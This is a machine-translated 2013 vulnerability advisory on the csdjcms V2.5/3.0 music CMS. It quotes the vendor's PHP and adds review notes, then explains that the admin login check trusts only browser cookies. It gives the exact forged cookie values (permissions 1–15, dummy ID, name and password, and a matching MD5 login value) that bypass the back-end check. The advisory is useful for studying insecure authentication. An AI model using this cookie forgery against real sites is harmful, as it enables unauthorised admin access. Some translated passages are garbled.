csdjcms(Cheng's dance music Management System) V 3.0 getshell vulnerabilities-vulnerability warning-the black bar safety net

2013-12-19T00:00:00
ID MYHACK58:62201341496
Type myhack58
Reporter 佚名
Modified 2013-12-19T00:00:00

Description

csdjcms a YY hack and YY pigs flow like with the sing website.

csdjcms V 2.5 code

//As usual, start by looking at the home page

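// Home-page entry script as quoted from csdjcms V2.5. Typographic quotes and a
// stray "the" introduced by page extraction are repaired so the listing parses;
// the vendor logic is unchanged.
include_once("include/install.php");

// Redirect to the installer while S_IsInstall is 0.
// NOTE(review): no exit follows header() in this excerpt, so the rest of the
// script keeps executing after the redirect is queued. A hardened version
// would stop the request here.
if(S_IsInstall==0){
    header("Location:install/install.php");
}

include_once("include/label.php");

// Render the template when S_Webmode is 1 or no static index.html exists;
// otherwise send the visitor to the static page.
if(S_Webmode==1 or !file_exists("index.html")){
    //Buffer
    $cache_id ='index_';
    // presumably start() returns true when a cached copy was already served -
    // confirm against the cache class, which is not shown here
    if(!($cache_opt->start($cache_id))){
        echo GetTemp("index.html",0);
        $cache_opt->end();
    }
}
else{
    header("Location:index.html");
}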

//Look at his configuration.

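/**
 * Read one request parameter and return it trimmed and backslash-escaped.
 *
 * csdjcms V2.5 helper as quoted by the advisory. Typographic quotes and the
 * split "$ magic" introduced by page extraction are repaired so the listing
 * parses; the vendor logic is unchanged.
 *
 * @param string $key      Name of the request parameter.
 * @param string $mode     'post' reads $_POST, 'get' reads $_GET; any other
 *                         value tries $_POST first and falls back to $_GET
 *                         when the POST value is empty.
 * @param string $isfilter When not '', the value is additionally passed
 *                         through lib_replace_end_tag() (defined elsewhere).
 * @return string The processed value, or '' when the parameter is absent.
 *
 * NOTE(review): addslashes() is the only escaping applied here. It escapes
 * quotes, backslashes and NUL bytes, which does not protect values placed in
 * unquoted SQL positions (for example numeric ids) or in HTML output, and it
 * is not a substitute for parameterized queries and per-context output
 * encoding.
 * NOTE(review): set_magic_quotes_runtime() was removed in PHP 7.0 and
 * get_magic_quotes_gpc() in PHP 8.0, so this helper only runs on legacy PHP.
 */
function SafeRequest($key,$mode,$isfilter=''){
    set_magic_quotes_runtime(0);
    // With magic_quotes_gpc on, PHP has already escaped the input, so the
    // value is only trimmed; otherwise addslashes() is applied here.
    $magic=get_magic_quotes_gpc();
    switch ($mode){
        case 'post':
            $value=isset($_POST[$key]) ? $magic ? trim($_POST[$key]) : addslashes(trim($_POST[$key])) : '';
            break;
        case 'get':
            $value=isset($_GET[$key]) ? $magic ? trim($_GET[$key]) : addslashes(trim($_GET[$key])) : '';
            break;
        default:
            $value=isset($_POST[$key]) ? $magic ? trim($_POST[$key]) : addslashes(trim($_POST[$key])) : '';
            // Fall back to the query string when nothing usable was posted.
            if($value==""){
                $value=isset($_GET[$key]) ? $magic ? trim($_GET[$key]) : addslashes(trim($_GET[$key])) : '';
            }
            break;
    }
    if($isfilter!='') {
        $value=lib_replace_end_tag($value);
    }
    return $value;
}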

//Submitted variables pass through the addslashes() security filter

//After studying the source code for a long time, I found a serious security hole in the admin back end

include “../include/conn.php”;

include “../include/function.php”;

include “admin_version.php”;

include “admin_loginstate.php”; //problem is in this file

//With the

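// Admin login-state check, apparently from admin_loginstate.php (the file the
// author names as the problem). Typographic quotes, the split "$ _COOKIE" and
// an annotation line that had lost its comment marker are repaired so the
// listing parses; the vendor logic is unchanged.
//
// NOTE(review): every input to the comparison below is a cookie, i.e. a value
// supplied by the browser. No server-side secret or session record takes part,
// so a match only shows that the client sent a self-consistent set of cookies,
// not that a login took place.
// NOTE(review): both failure branches only echo a client-side redirect; no
// exit/die is visible in this excerpt, so the including page would keep
// executing on the server.
// NOTE(review): the cookie names suggest the admin password, or a value
// derived from it, is kept client-side - confirm in the login code.
// Mitigation: keep login state and permissions in a server-side session
// created at login, compare any tokens with hash_equals(), and terminate the
// request when the check fails.
if(empty($_COOKIE['S_AdminID'])){ //first check whether the S_AdminID cookie exists
    echo "<script>window. location='admin_login.php'</script>";
}
elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_AdminID'].$_COOKIE['S_AdminUserName'].$_COOKIE['S_AdminPassWord'].$_COOKIE['S_Permission'])){
    //Here is the key to the problem:
    //if S_Login equals the MD5 of the four cookie values concatenated, verification passes directly.
    echo "<script>window. parent. location='admin_login.php'</script>";
}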

//Admin back-end permission check

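/**
 * Stop the request unless $Column appears in the S_Permission cookie.
 *
 * csdjcms V2.5 helper as quoted by the advisory. Typographic quotes
 * introduced by page extraction are repaired so the listing parses; the
 * vendor logic and message text are unchanged.
 *
 * @param mixed $Column Permission identifier, compared loosely (==) with each
 *                      comma-separated entry of the cookie.
 * @return void Returns normally when a matching entry exists; otherwise the
 *              script die()s after emitting a jAlert() script block.
 *
 * NOTE(review): the permission list is read from $_COOKIE, which the client
 * controls, and nothing in this function checks it against a server-side
 * record. Mitigation: load the permissions for the authenticated account from
 * the server-side session or database instead of from the request.
 */
function SystemPer($Column){
    if(empty($_COOKIE['S_Permission'])){
        die("<script>jAlert('sorry, you have no right to limit the operation of this function!',' Operation error',function(R){window. location='javascript:history. go(-1)';})</script>");
    }else{
        $SystemPermission=explode(",",$_COOKIE['S_Permission']); //split the permission list on "," into an array
        $StateOK=0;
        $ArrSystemPermission=count($SystemPermission);
        // Scan every entry; the loop does not stop at the first match.
        for($k=0;$k<$ArrSystemPermission;$k++){
            if($SystemPermission[$k]==$Column){ //entry matches the requested permission
                $StateOK=1;
            }
        }
        if($StateOK==0){
            die("<script>jAlert('sorry, you have no right to limit the operation of this function!',' Operation error',function(R){window. location='javascript:history. go(-1)';})</script>");
        }
    }
}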

//Construct the lustful cookies

//S_Permission

//1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

//S_Login

//md5(AdminID+AdminUserName+AdminPassWord+S_Permission)

//S_AdminUserName

//1

//S_AdminPassWord

//1

//S_AdminID

//1

The admin back-end check is successfully bypassed.

//The 3.0 version is the same

<? php

Name: PHP version of the stroke's music, CMS management system, v3. 0
